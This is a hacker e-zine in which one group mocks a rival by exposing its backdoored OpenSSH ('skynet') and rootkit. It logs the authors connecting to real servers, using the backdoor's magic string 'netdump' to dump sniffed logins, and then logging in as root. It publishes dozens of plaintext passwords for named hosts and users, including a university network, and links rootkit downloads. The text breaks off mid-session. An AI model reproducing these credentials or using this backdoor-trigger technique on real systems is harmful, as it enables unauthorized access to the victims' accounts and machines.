Copy Link
Add to Bookmark
Report

x0x0x-exposed

eZine's profile picture
Published in 
x0x0x exposed
 · 4 years ago

  

#!/labsec/v/for/vendetta:book1-x0x0x
######################################################################################################################
# #
# .____ ___. _________ #
# | | _____ \_ |__ / _____/ ____ ____ #
# | | \__ \ | __ \ \_____ \_/ __ \_/ ___\ #
# | |___ / __ \| \_\ \/ \ ___/\ \___ #
# |_______ (____ /___ /_______ /\___ >\___ > #
# \/ \/ \/ \/ \/ \/ #
# .___ .___ __ .__ #
# | | ____ __| _/_ __ _______/ |________|__| ____ ______ #
# | |/ \ / __ | | \/ ___/\ __\_ __ \ |/ __ \ / ___/ #
# | | | \/ /_/ | | /\___ \ | | | | \/ \ ___/ \___ \ #
# |___|___| /\____ |____//____ > |__| |__| |__|\___ >____ > #
# \/ \/ \/ \/ \/ #
# #
# #
# - presents: #
# \- x0x0x exposed -/ #
# #
######################################################################################################################
# #
# #
# chapter one : random lame stuff #
# chapter two : owned by yourself #
# chapter three : download files/sniffs/stuff #
# chapter four : conclusion #
# - x0x0x - #
# #
# #
# - [V]endetta. #
# #
#################################################################


- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)
- <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !


#################################################################
# #
# #
# _ _ #
# __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ #
# / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) #
# \__|_||_\__,_| .__/\__\___|_| \___/_||_\___| #
# |_| #
# #
# #
#################################################################


first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))

[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt

have you noticed how lame they are ?

all they can & will ever do is change your openssh version to a cracked one
and pray that the users will log into some kool server

and guess what, its NOT EVEN MADE by them ! - lets check it out -

central@labsec [~xoxox/openssh-4.7p1] # more skynet.h
/*


### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### ####

- V E R S I O N 1. 0 -
coded by fmrj
11.01.2008


Features:
- Logs SSH, SCP, SFTP, SSHD and ip / hostname
- ftp logger included (netkit-ftp)
- Encrypted sniffer logs
- SSH, SCP, SFTP will not log you
- compile script (see compile.sh)
- rootlogin is permitted even though remoterootlogin is set to no
- Will not log to syslog, utmp, wtmp or lastlog
- If MAGIC_VERSION is NOT undeclared:
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
(WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
Also this will NOT get logged by syslog


Future features:
- pid hiding
- More encryption / better sniffer encryption (thought of rc-crypt)
- strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
- Have a cool PS1 for the bd
- Write a ssh client that can:
-> Connect and dump logs so you dont have to use telnet approach (encrypted)
-> That can do connect-chain (ssh -bounce box1 box2 box3)


If you have this, it either means we are friends or someone gave it to you, if so
I would like this bd to be kept as private as possible, so please dont pass it on

I would also appreciate suggestions / ideas / help / whatever for future features
aim: fmrj09


- Thanks *

*/

- then there is some shit aion code which is public @ packetstorm -
- their kool sshd backdoor kan be found in the end of thiz zine -
- dont forget to check the gr8 shellscript skotch made -

################################## leTz hIghTlIghT 50m3th1n6 #############################
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
################################## LETS HIGHLIGHT SOMETHING #############################

ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !

*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks*


central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION "netdump"


----- th4nk5 8uddY ------
----- end of lame sshd backdor ----

***************** phalanx the gr8 kernel rootkit ***************

7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?

PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2

* attached their k00l phalanx in the bottom of the zine *

***************** phalanx the gr8 kernel rootkit ***************

------ funny stuff:

while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..

[139.82.95.11:22] : SSH-2.0-p2-FC-4.3
[212.200.96.150:22] : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[216.75.56.186:22] : SSH-2.0-OenSSH_4.2
[140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5
[143.107.250.214:22] : SSH-1.99-p1
[201.62.131.185:22] : SSH-2.0-p1 Debian-8ubuntu1.2
[200.144.189.17:22] : SSH-1.99-p1

you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners.


[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ?
they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]

#################################################################
# #
# __ __ __ #
# ____/ / ___ ____ / /____ ____ / /__ _____ #
# / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ #
# \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ #
# /_/ #
# #
# #
#################################################################

; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
;
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE




central@labsec [~xoxox/h3h3] # telnet 189.3.219.4 22
Trying 189.3.219.4...
Connected to 189.3.219.4 (189.3.219.4).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
SSH2_OUT: 127.0.0.1 user: root pass: R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd
- cut-

******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4
root@189.3.219.4's password:



Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222


**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux servnet 2.6.18-4-486 i686 ****

root@servnet:~#
root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
inet addr:189.3.219.4 Bcast:189.3.219.63 Mask:255.255.255.192

root@servnet:~# last -1 root
root pts/2 189.4.161.222 Fri Aug 8 16:27 - 16:32 (00:04)
222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br.


******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 91.199.207.141 22
Trying 91.199.207.141...
Connected to 91.199.207.141.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
SSH2_OUT: 127.0.0.1 user: root pass: buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
pass_from: 91.199.207.142 user: root pass: salinarsalinar (x2.sprintdns.net) -->>>>>>>>>> i hope you guys change the passwd real quick :)

central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
root@91.199.207.141's password:

Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux x1 2.6.18-6-686 i686 ****

root@x1:~#
root@x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38 (00:20)
root@x1:~# ifconfig -a|grep inet
inet addr:91.199.207.141 Bcast:91.199.207.255 Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 195.91.248.58 22
Trying 195.91.248.58...
Connected to 195.91.248.58.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
SSH2_OUT: 127.0.0.1 user: root pass: DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.


central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
root@195.91.248.58's password:

Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux localhost 2.6.24-gentoo-r3 i686 ****

localhost ~ #
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux
10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07 (00:06)

wtmp begins Mon Mar 31 21:49:08 2008
inet addr:195.91.248.58 Bcast:195.91.248.63 Mask:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 195.71.126.86 22
Trying 195.71.126.86...
Connected to 195.71.126.86.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.2
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from: 91.128.212.13 user: root pass: w22662s (d91-128-212-13.cust.tele2.at) ---->>>> no localhost this time(yay!) but it works.

central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
root@195.71.126.86's password:

root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc
root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash
root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc
inet Adresse:195.71.126.86 Bcast:195.71.126.95 Maske:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 152.66.208.100 22
Trying 152.66.208.100...
Connected to 152.66.208.100.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
SSH2_OUT: 127.0.0.1 user: joeb pass: xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
pass_from: 78.131.80.171 user: joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu) > better be changing that by now.
SSH2_OUT: 78.131.80.171 user: joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu)> better be changing that by now.
SSH2_OUT: 84.2.126.154 user: joeb pass: valami (dsl54027E9A.pool.t-online.hu) > better be changing that by now.

central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
root@152.66.208.100's password:

Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux maszat 2.6.18-6-686-bigmem i686 ****

root@maszat:~#
root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:152.66.208.100 Bcast:152.66.208.127 Mask:255.255.255.128
inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 147.46.242.9 22
Trying 147.46.242.9...
Connected to 147.46.242.9.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
SSH2_OUT: 127.0.0.1 user: root pass: NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
pass_from: 147.46.242.52 user: dreameye pass: ii1945 (ropas.snu.ac.kr) ------>>>>>>>>>>>>>> sorry koreans, nothing personal.
pass_from: 211.48.102.167 user: dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean, personal with you, you no.

central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
root@147.46.242.9's password:

Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux abs 2.6.24-19-server i686 ****

root@abs:~#
root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:147.46.242.9 Bcast:147.46.242.255 Mask:255.255.255.0
inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
dreameye pts/0 ropas.snu.ac.kr Thu Aug 7 03:35 - 03:36 (00:00)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022 ----- same applies for 200.160.119.93 (another dumbox on the network)
Trying 200.160.119.92...
Connected to 200.160.119.92.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user?
pass_from: 192.168.100.231 user: root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y

central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92 -p 8022
root@200.160.119.92's password:

******* no skynet thiz timE *********** h3h3h3h3 ***********

Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
root@eumisrvgw2:~#
root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:192.168.100.242 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
inet addr:192.168.200.254 Bcast:192.168.200.255 Mask:255.255.255.0
inet addr:200.160.119.92 Bcast:200.160.119.95 Mask:255.255.255.240
inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
inet addr:200.169.223.172 Bcast:200.169.223.175 Mask:255.255.255.248

root@eumisrvgw2:~# last -10 root|grep 189\.4
root pts/0 189.4.161.222 Mon Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who that kool ip iz.
----------------------->>>>> bruteforce again? what a zhame !
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.20.9.67 22
Trying 200.20.9.67...
Connected to 200.20.9.67.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1 user: root pass: vEcTrrA (localhost)

central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67 -p 8022
root@200.20.9.67's password:

root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00
root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT ------------>> this is their default sniffer path.
SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuX0527 (didi.if.uff.int)
SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuXS0527 (didi.if.uff.int)
SSH2_OUT: 10.0.0.101 user: nuno pass: surfar (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.106 user: lourenco pass: LiNuX0527 (cerbero4.if.uff.int)
SSH2_OUT: 10.0.0.108 user: critter pass: 559832 (ronaldinho.if.uff.int)
SSH2_OUT: 10.0.0.136 user: davidvaz pass: 2o3145 (barabasi.if.uff.int)
SSH2_OUT: 10.0.0.145 user: lubian pass: 15862jLr (lip-serverI.if.uff.int)
SSH2_OUT: 10.0.0.147 user: mcosta pass: 950205 (nano3.if.uff.int)
SSH2_OUT: 10.0.0.155 user: asa pass: gabixande2 (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.155 user: mcosta pass: 950205 (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.156 user: thiagofts pass: 8vacagk (Owner-PC.if.uff.int)
SSH2_OUT: 10.0.0.157 user: alanfr pass: ck37=2x (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: curso pass: curso (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: help pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: opeador pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: operador pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.179 user: orahcio pass: wulto12 (viagra.if.uff.int)
SSH2_OUT: 10.0.0.188 user: nuno pass: surfar (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.195 user: asa pass: gabixande2 (nano2.if.uff.int)
SSH2_OUT: 10.0.0.196 user: isidoro pass: VU4R9C (zico.if.uff.int)
SSH2_OUT: 10.0.0.2 user: isidoro pass: VU4R9C
SSH2_OUT: 10.0.0.208 user: davidvaz pass: 2o3145 (homer.if.uff.int)
SSH2_OUT: 10.0.0.208 user: davidvaz pass: o3145 (homer.if.uff.int)
SSH2_OUT: 10.0.0.208 user: tgmattos pass: CAMtgm&7 (homer.if.uff.int)
SSH2_OUT: 10.0.0.215 user: asa pass: gabixande2 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX0527 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX05427 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.217 user: dionizio pass: Zoedoulos (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.217 user: lourenco pass: LiNuX0527 (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX0527 (romario.if.uff.int)
SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX527 (romario.if.uff.int)
SSH2_OUT: 10.0.0.226 user: dionizio pass: Zoedoulos (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226 user: lourenco pass: LiNuX0527 (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226 user: lourenco pass: exit (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.227 user: jssm pass: Jujaja (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227 user: nuno pass: surfar (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227 user: pmco pass: druida99 (complex000.if.uff.int)
SSH2_OUT: 10.0.0.231 user: alan pass: ck37=2x
SSH2_OUT: 10.0.0.231 user: root pass: slacksucks!
SSH2_OUT: 10.0.0.231 user: root pass: slacksucks! (urania.if.uff.int)
SSH2_OUT: 10.0.0.246 user: bernardo pass: (damasco.if.uff.int)
SSH2_OUT: 10.0.0.246 user: bernardo pass: truthno1 (damasco.if.uff.int)
SSH2_OUT: 10.0.0.247 user: jssm pass: Jujaja (gould.if.uff.int)
SSH2_OUT: 10.0.0.44 user: tgmattos pass: CAMtgm&7
SSH2_OUT: 10.0.0.60 user: fsilveira pass: Instituto
SSH2_OUT: 10.0.0.60 user: fsilveira pass: VaiPasSar
SSH2_OUT: 10.0.0.75 user: davidvaz pass: 2o3145 (DOAS-Laptop.if.uff.int)
SSH2_OUT: 10.0.0.78 user: alan pass: ck37=2x (urania.if.uff.int)
SSH2_OUT: 10.0.0.93 user: pmco pass: druida99 (urubu.if.uff.int)
SSH2_OUT: 10.0.0.93 user: pmco pass: druidruida99 (urubu.if.uff.int)
SSH2_OUT: 10.0.0.97 user: critter pass: 559832 (ronaldinho.if.uff.int)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 203.161.120.230 22
Trying 203.161.120.230...
Connected to 203.161.120.230.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
pass_from: 58.7.216.153 user: root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry pal.

central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
root@203.161.120.230's password:

----- no skynet -------

Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au
zeus:~#
zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:203.161.120.230 Bcast:203.161.120.255 Mask:255.255.255.240
inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
inet addr:11.11.11.3 Bcast:11.255.255.255 Mask:255.255.255.0

zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more
SSH2_OUT: 11.11.11.55 user: michael pass: @pixar87
SSH2_OUT: 11.11.11.55 user: michael pass: dh0st1ngd
SSH2_OUT: 11.11.11.55 user: michael pass: ruup2it
SSH2_OUT: 11.11.11.55 user: root pass: @pixar87
SSH2_OUT: 11.11.11.9 user: admin pass: @pixar87
SSH2_OUT: 11.11.11.9 user: admin pass: emaildivers
SSH2_OUT: 11.11.11.9 user: admin pass: jugg3r0
SSH2_OUT: 11.11.11.9 user: root pass: @pixar887
SSH2_OUT: 11.11.11.9 user: root pass: jugg3r0
pass_from: 10.10.10.129 user: root pass: @pixar87

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 207.145.66.12 22
Trying 207.145.66.12...
Connected to 207.145.66.12.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from: 24.218.192.76 user: root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro
pass_from: 75.68.31.152 user: gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(

central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
root@207.145.66.12's password:

Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201 --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ?
--------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...

d4:~#
d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:207.145.66.12 Bcast:207.145.66.255 Mask:255.255.255.0
inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.111.196.163 22
Trying 212.111.196.163...
Connected to 212.111.196.163.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
SSH2_OUT: 127.0.0.1 user: root pass: x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost.
pass_from: ::ffff:10.66.10.111 user: root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(

central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
root@212.111.196.163's password:

Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222 ------------>>>>>>>>>>>>>> lets laugh for a while now

**** Connected to ****

### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
